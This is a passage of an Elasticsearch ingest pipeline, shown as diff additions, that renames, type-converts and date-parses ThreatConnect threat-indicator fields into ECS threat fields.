+ - _ingest._value.userName + - _ingest._value.reminderDate + - _ingest._value.publishDate + - _ingest._value.ownerId + - _ingest._value.ownerName + - _ingest._value.generatedReport + - _ingest._value.webLink + - _ingest._value.upVoteCount + - _ingest._value.upVote + - _ingest._value.scoreIncludesBody + - _ingest._value.scoreBreakdown + - _ingest._value.to + - _ingest._value.from + tag: remove_duplicate_fields + ignore_missing: true + - script: + lang: painless + description: This script rename fields belongs to json associatedIndicators data objects. + if: ctx.json?.associatedIndicators?.data != null + params: + "AS Number": "as_number" + "hostName": "host_name" + "Hashtag": "hashtag" + "Key Name": "key_name" + "legacyLink": "legacy_link" + "Mutex": "mutex" + "Subject": "subject" + "User Agent String": "user_agent_string" + "webLink": "web_link" + tag: painless_to_rename_fields_under_json_associatedIndicators_data_object + source: | + def renameKeys(Map json, Map keyMap) { + def updatedJson = new HashMap(); + for (def entry: json.entrySet()) { + def key = entry.getKey(); + def value = entry.getValue(); + if (value instanceof Map) { + if (keyMap.containsKey(key)) { + updatedJson[keyMap[key]] = renameKeys(value, keyMap); + } else { + updatedJson[key] = renameKeys(value, keyMap); + } + } else if (value instanceof List) { + def updatedList = []; + for (def item: value) { + if (item instanceof Map) { + updatedList.add(renameKeys(item, keyMap)); + } else { + updatedList.add(item); + } + } + if (keyMap.containsKey(key)) { + updatedJson[keyMap[key]] = updatedList; + } else { + updatedJson[key] = value; + } + } else { + if (keyMap.containsKey(key)) { + updatedJson[keyMap[key]] = value; + } else { + updatedJson[key] = value; + } + if (key=='location') { + updatedJson['location_value'] = value; + updatedJson.remove('location'); + } + } + } + return updatedJson; + } + def entities_obj = new ArrayList(); + for(entity in ctx.json.associatedIndicators.data){ + entities_obj.add(renameKeys(entity, params)); + } + ctx.entities_obj=entities_obj; + - rename: + field: entities_obj + target_field: threat_connect.indicator.associated_indicators.data + tag: rename_entities_obj + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_size_to_string + processor: + convert: + field: _ingest._value.size + tag: convert_associatedIndicators_data_size_to_string + target_field: _ingest._value.size + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.size + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_active_to_boolean + processor: + convert: + field: _ingest._value.active + tag: convert_associatedIndicators_data_active_to_boolean + target_field: _ingest._value._temp.value + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.active + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_activeLocked_to_boolean + processor: + convert: + field: _ingest._value.activeLocked + tag: convert_associatedIndicators_data_activeLocked_to_boolean + target_field: _ingest._value._temp.locked + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.activeLocked + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_rename_associatedIndicators_data_block + processor: + rename: + field: _ingest._value.Block + tag: rename_associatedIndicators_data_block + target_field: _ingest._value.block + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_block + processor: + convert: + field: _ingest._value.Block + type: ip + tag: convert_associatedIndicators_data_block + target_field: related.ip + ignore_failure: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_confidence_to_long + processor: + convert: + field: _ingest._value.confidence + tag: convert_associatedIndicators_data_confidence_to_long + type: long + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.confidence + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_dateAdded + processor: + date: + field: _ingest._value.dateAdded + tag: date_associatedIndicators_data_dateAdded + target_field: _ingest._value.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dateAdded + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_dnsActive_to_boolean + processor: + convert: + field: _ingest._value.dnsActive + tag: convert_associatedIndicators_data_dnsActive_to_boolean + target_field: _ingest._value.dns_active + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.dnsActive + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_externalDateAdded + processor: + date: + field: _ingest._value.externalDateAdded + tag: date_associatedIndicators_data_externalDateAdded + target_field: _ingest._value.external.date.added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalDateAdded + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_externalDateExpires + processor: + date: + field: _ingest._value.externalDateExpires + tag: date_associatedIndicators_data_externalDateExpires + target_field: _ingest._value.external.date.expires + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalDateExpires + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_externalLastModified + processor: + date: + field: _ingest._value.externalLastModified + tag: date_associatedIndicators_data_externalLastModified + target_field: _ingest._value.external.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.externalLastModified + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_firstSeen + processor: + date: + field: _ingest._value.firstSeen + tag: date_associatedIndicators_data_firstSeen + target_field: _ingest._value.first_seen + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.firstSeen + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_id_to_string + processor: + convert: + field: _ingest._value.id + tag: convert_associatedIndicators_data_id_to_string + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.id + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_ip_to_ip + processor: + convert: + field: _ingest._value.ip + tag: convert_associatedIndicators_data_ip_to_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.ip + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_append_associatedIndicators_data_ip_into_related_ip + processor: + append: + field: related.ip + tag: append_associatedIndicators_data_ip_into_related_ip + value: '{{{_ingest._value.value.ip}}}' + allow_duplicates: false + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_lastModified + processor: + date: + field: _ingest._value.lastModified + tag: date_associatedIndicators_data_lastModified + target_field: _ingest._value.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastModified + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_date_associatedIndicators_data_lastSeen + processor: + date: + field: _ingest._value.lastSeen + tag: date_associatedIndicators_data_lastSeen + target_field: _ingest._value.last_seen + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastSeen + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_ownerId_to_string + processor: + convert: + field: _ingest._value.ownerId + tag: convert_associatedIndicators_data_ownerId_to_string + target_field: _ingest._value.owner.id + type: string + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_rename_associatedIndicators_data_ownerName + processor: + rename: + field: _ingest._value.ownerName + tag: rename_associatedIndicators_data_ownerName + target_field: _ingest._value.owner.name + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_privateFlag_to_boolean + processor: + convert: + field: _ingest._value.privateFlag + tag: convert_associatedIndicators_data_privateFlag_to_boolean + target_field: _ingest._value.private_flag + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.privateFlag + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_rating_to_double + processor: + convert: + field: _ingest._value.rating + tag: convert_associatedIndicators_data_rating_to_double + type: double + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.rating + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_rename_associatedIndicators_data_Value_Name + processor: + rename: + field: _ingest._value.Value Name + tag: rename_associatedIndicators_data_Value_Name + target_field: _ingest._value.value.name + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_rename_associatedIndicators_data_Value_Type + processor: + rename: + field: _ingest._value.Value Type + tag: rename_associatedIndicators_data_Value_Type + target_field: _ingest._value.value.type + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_convert_associatedIndicators_data_whoisActive_to_boolean + processor: + convert: + field: _ingest._value.whoisActive + tag: convert_associatedIndicators_data_whoisActive_to_boolean + target_field: _ingest._value.whois_active + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.whoisActive + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_associated_indicators_remove_duplicate_fields + processor: + remove: + field: + - _ingest._value.active + - _ingest._value.activeLocked + - _ingest._value.Block + - _ingest._value.dnsActive + - _ingest._value.dateAdded + - _ingest._value.externalDateAdded + - _ingest._value.externalDateExpires + - _ingest._value.externalLastModified + - _ingest._value.firstSeen + - _ingest._value.lastSeen + - _ingest._value.lastModified + - _ingest._value.ownerId + - _ingest._value.privateFlag + - _ingest._value.Value Type + - _ingest._value.Value Name + - _ingest._value.whoisActive + tag: remove_duplicate_fields + ignore_missing: true + - foreach: + field: threat_connect.indicator.associated_indicators.data + if: ctx.threat_connect?.indicator?.associated_indicators?.data != null + tag: foreach_rename_temp_to_active + processor: + rename: + field: _ingest._value._temp + tag: rename_temp_to_active + target_field: _ingest._value.active + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_rename_attributes_data_createdBy_firstName + processor: + rename: + field: _ingest._value.createdBy.firstName + tag: rename_attributes_data_createdBy_firstName + target_field: _ingest._value.created_by.first_name + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_append_attributes_data_createdBy_firstName_into_related_user + processor: + append: + field: related.user + tag: append_attributes_data_createdBy_firstName_into_related_user + value: '{{{_ingest._value.created_by.first_name}}}' + allow_duplicates: false + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_convert_attributes_data_createdBy_id_to_string + processor: + convert: + field: _ingest._value.createdBy.id + tag: convert_attributes_data_createdBy_id_to_string + target_field: _ingest._value.created_by.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_rename_attributes_data_createdBy_lastName + processor: + rename: + field: _ingest._value.createdBy.lastName + tag: rename_attributes_data_createdBy_lastName + target_field: _ingest._value.created_by.last_name + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_append_attributes_data_createdBy_lastName_into_related_user + processor: + append: + field: related.user + tag: append_attributes_data_createdBy_lastName_into_related_user + value: '{{{_ingest._value.created_by.last_name}}}' + allow_duplicates: false + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_rename_attributes_data_createdBy_owner + processor: + rename: + field: _ingest._value.createdBy.owner + tag: rename_attributes_data_createdBy_owner + target_field: _ingest._value.created_by.owner + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_rename_attributes_data_createdBy_pseudonym + processor: + rename: + field: _ingest._value.createdBy.pseudonym + tag: rename_attributes_data_createdBy_pseudonym + target_field: _ingest._value.created_by.pseudonym + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_rename_attributes_data_createdBy_userName + processor: + rename: + field: _ingest._value.createdBy.userName + tag: rename_attributes_data_createdBy_userName + target_field: _ingest._value.created_by.user_name + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_append_attributes_data_createdBy_userName_into_related_user + processor: + append: + field: related.user + tag: append_attributes_data_createdBy_userName_into_related_user + value: '{{{_ingest._value.created_by.user_name}}}' + allow_duplicates: false + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_date_attributes_data_dateAdded + processor: + date: + field: _ingest._value.dateAdded + tag: date_attributes_data_dateAdded + target_field: _ingest._value.date_added + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.dateAdded + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_convert_attributes_data_default_to_boolean + processor: + convert: + field: _ingest._value.default + tag: convert_attributes_data_default_to_boolean + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_date_attributes_data_lastModified + processor: + date: + field: _ingest._value.lastModified + tag: date_attributes_data_lastModified + target_field: _ingest._value.last_modified + formats: + - ISO8601 + on_failure: + - remove: + field: _ingest._value.lastModified + ignore_missing: true + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_convert_attributes_data_pinned_to_boolean + processor: + convert: + field: _ingest._value.pinned + tag: convert_attributes_data_pinned_to_boolean + type: boolean + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.pinned + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.attributes.data + if: ctx.json?.attributes?.data != null + tag: foreach_convert_attributess_data_id_to_string + processor: + convert: + field: _ingest._value.id + tag: convert_attributess_data_id_to_string + target_field: _ingest._value.id + type: string + ignore_missing: true + on_failure: + - remove: + field: _ingest._value.default + ignore_missing: true + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.attributes.data + tag: rename_attributes_data + target_field: threat_connect.indicator.attributes.data + ignore_missing: true + - foreach: + field: threat_connect.indicator.attributes.data + if: ctx.threat_connect?.indicator?.attributes?.data != null + tag: foreach_remove_attributes_duplicate_fields + processor: + remove: + field: + - _ingest._value.createdBy.firstName + - _ingest._value.createdBy.lastName + - _ingest._value.createdBy.id + - _ingest._value.lastModified + - _ingest._value.dateAdded + - _ingest._value.userName + tag: remove_attributes_duplicate_fields + ignore_missing: true + - rename: + field: json.Block + tag: rename_Block + target_field: threat_connect.indicator.block + ignore_missing: true + - convert: + field: json.confidence + tag: convert_confidence_to_long + target_field: threat_connect.indicator.confidence + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + lang: painless + if: ctx.json?.confidence != null + description: Normalize confidence level. + source: > + def value = ctx.json?.confidence; + def confidence = "None"; + if (value == 0) { + confidence = "Not Specified"; + } if (value > 1 && value < 40) { + confidence = "Low"; + } if (value >= 40.0 && value < 70) { + confidence = "Medium"; + } else if (value >= 70 && value <= 100) { + confidence = "High"; + } + ctx.threat.indicator.put("confidence", confidence) + - rename: + field: json.customAssociations + tag: rename_customAssociations + target_field: threat_connect.indicator.custom_associations + ignore_missing: true + - convert: + field: json.dnsActive + tag: convert_dnsActive_to_boolean + target_field: threat_connect.indicator.dns_active + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.description + tag: rename_description + target_field: threat_connect.indicator.description + ignore_missing: true + - set: + field: threat.indicator.description + tag: set_threat_indicator_description_from_indicator_description + copy_from: threat_connect.indicator.description + ignore_empty_value: true + - rename: + field: json.dnsResolution + tag: rename_dnsResolution + target_field: threat_connect.indicator.dns_resolution + ignore_missing: true + - rename: + field: json.enrichment + tag: rename_enrichment + target_field: threat_connect.indicator.enrichment + ignore_missing: true + - date: + field: json.externalDateAdded + tag: date_externalDateAdded + target_field: threat_connect.indicator.external.date.added + formats: + - ISO8601 + if: ctx.json?.externalDateAdded != null && ctx.json.externalDateAdded != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.externalDateExpires + tag: date_externalDateExpires + target_field: threat_connect.indicator.external.date.expires + formats: + - ISO8601 + if: ctx.json?.externalDateExpires != null && ctx.json.externalDateExpires != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.externalLastModified + tag: date_externalLastModified + target_field: threat_connect.indicator.external_last.modified + formats: + - ISO8601 + if: ctx.json?.externalLastModified != null && ctx.json.externalLastModified != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.modified_at + tag: set_threat_indicator_modified_at_from_indicator_external_last_modified + copy_from: threat_connect.indicator.external_last.modified + ignore_empty_value: true + - convert: + field: json.falsePositiveReportedByUser + tag: convert_falsePositiveReportedByUser_to_boolean + target_field: threat_connect.indicator.false_positive_reported_by_user + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.falsePositives + tag: convert_falsePositives_to_long + target_field: threat_connect.indicator.false_positives + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.fileActions + tag: rename_fileActions + target_field: threat_connect.indicator.file_actions + ignore_missing: true + - rename: + field: json.fileOccurrences + tag: rename_fileOccurrences + target_field: threat_connect.indicator.file_occurrences + ignore_missing: true + - date: + field: json.firstSeen + tag: date_firstSeen + target_field: threat_connect.indicator.first_seen + formats: + - ISO8601 + if: ctx.json?.firstSeen != null && ctx.json.firstSeen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.first_seen + tag: set_threat_indicator_first_seen_from_indicator_first_seen + copy_from: threat_connect.indicator.first_seen + ignore_empty_value: true + - rename: + field: json.genericCustomIndicatorValues + tag: rename_genericCustomIndicatorValues + target_field: threat_connect.indicator.generic_custom_indicator_values + ignore_missing: true + - rename: + field: json.geoLocation + tag: rename_geoLocation + target_field: threat_connect.indicator.geo_location + ignore_missing: true + - rename: + field: json.Hashtag + tag: rename_Hashtag + target_field: threat_connect.indicator.hashtag + ignore_missing: true + - rename: + field: json.hostName + tag: rename_hostName + target_field: threat_connect.indicator.host_name + ignore_missing: true + - set: + field: observer.hostname + tag: set_observer_hostname_from_indicator_host_name + copy_from: threat_connect.indicator.host_name + ignore_empty_value: true + - append: + field: related.hosts + tag: convert_hostname_address_to_related_host + value: '{{{threat_connect.indicator.host_name}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.host_name != null + - convert: + field: json.id + tag: convert_id_to_string + target_field: threat_connect.indicator.id + type: string + ignore_missing: true + - rename: + field: json.investigationLinks + tag: rename_investigationLinks + target_field: threat_connect.indicator.investigation_links + ignore_missing: true + - convert: + field: json.ip + tag: convert_ip_to_ip + target_field: threat_connect.indicator.ip + type: ip + ignore_missing: true + if: ctx.json?.ip != null && ctx.json.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: convert_ip_to_related_ip + value: '{{{threat_connect.indicator.ip}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.ip != null + - date: + field: json.lastFalsePositive + tag: date_lastFalsePositive + target_field: threat_connect.indicator.last_false_positive + formats: + - ISO8601 + if: ctx.json?.lastFalsePositive != null && ctx.json.lastFalsePositive != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.lastModified + tag: date_lastModified + target_field: threat_connect.indicator.last_modified + formats: + - ISO8601 + if: ctx.json?.lastModified != null && ctx.json.lastModified != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: '@timestamp' + tag: set_@timestamp_from_indicator_last_modified + copy_from: threat_connect.indicator.last_modified + ignore_empty_value: true + - date: + field: json.lastSeen + tag: date_lastSeen + target_field: threat_connect.indicator.last_seen + formats: + - ISO8601 + if: ctx.json?.lastSeen != null && ctx.json.lastSeen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.last_seen + tag: set_threat_indicator_last_seen_from_indicator_last_seen + copy_from: threat_connect.indicator.last_seen + ignore_empty_value: true + - date: + field: json.dateAdded + tag: date_dateAdded + target_field: threat_connect.indicator.date_added + formats: + - ISO8601 + if: ctx.json?.dateAdded != null && ctx.json.dateAdded != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.type + tag: rename_type + target_field: threat_connect.indicator.type + ignore_missing: true + - script: + description: Add value for event category based on action. + tag: script_to_add_category + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type != '' + lang: painless + source: >- + if (ctx.threat_connect.indicator.type.contains('File')) { + ctx.threat.indicator.type = ['file']; + } else if (ctx.threat_connect.indicator.type.contains('URL')){ + ctx.threat.indicator.type = ['url']; + } else if (ctx.threat_connect.indicator.type.contains('EmailAddress')){ + ctx.threat.indicator.type = ['email-addr']; + } else if (ctx.threat_connect.indicator.type.contains('Mutex')){ + ctx.threat.indicator.type = ['mutex']; + } else if (ctx.threat_connect.indicator.type.contains('Registry Key')){ + ctx.threat.indicator.type = ['windows-registry-key']; + } + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.ip + tag: set_threat_indicator_ip_from_indicator_ip + copy_from: threat_connect.indicator.ip + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.type == 'Address' + - set: + field: threat.indicator.type + tag: set_threat_indicator_type_to_ipv6_addr + value: ipv6-addr + if: ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.type == 'Address' && ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.ip.contains(":") + - set: + field: threat.indicator.type + tag: set_threat_indicator_type_to_ipv4_addr + value: ipv4-addr + if: ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.type == 'Address' && ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.ip.contains(".") + - rename: + field: json.legacyLink + tag: rename_legacyLink + target_field: threat_connect.indicator.legacy_link + ignore_missing: true + - append: + field: threat.indicator.reference + tag: append_threat_indicator_reference_from_indicator_legacy_link + value: '{{{threat_connect.indicator.legacy_link}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.legacy_link != null + - rename: + field: json.md5 + tag: rename_md5 + target_field: threat_connect.indicator.md5 + ignore_missing: true + - set: + field: threat.indicator.file.hash.md5 + tag: set_threat_indicator_file_hash_md5_from_indicator_md5 + copy_from: threat_connect.indicator.md5 + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type.contains('File') + - rename: + field: json.Key Name + tag: rename_Key Name + target_field: threat_connect.indicator.key_name + ignore_missing: true + - set: + field: threat.indicator.registry.path + tag: set_threat_indicator_registry_path_from_indicator_key_name + copy_from: threat_connect.indicator.key_name + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type instanceof String && 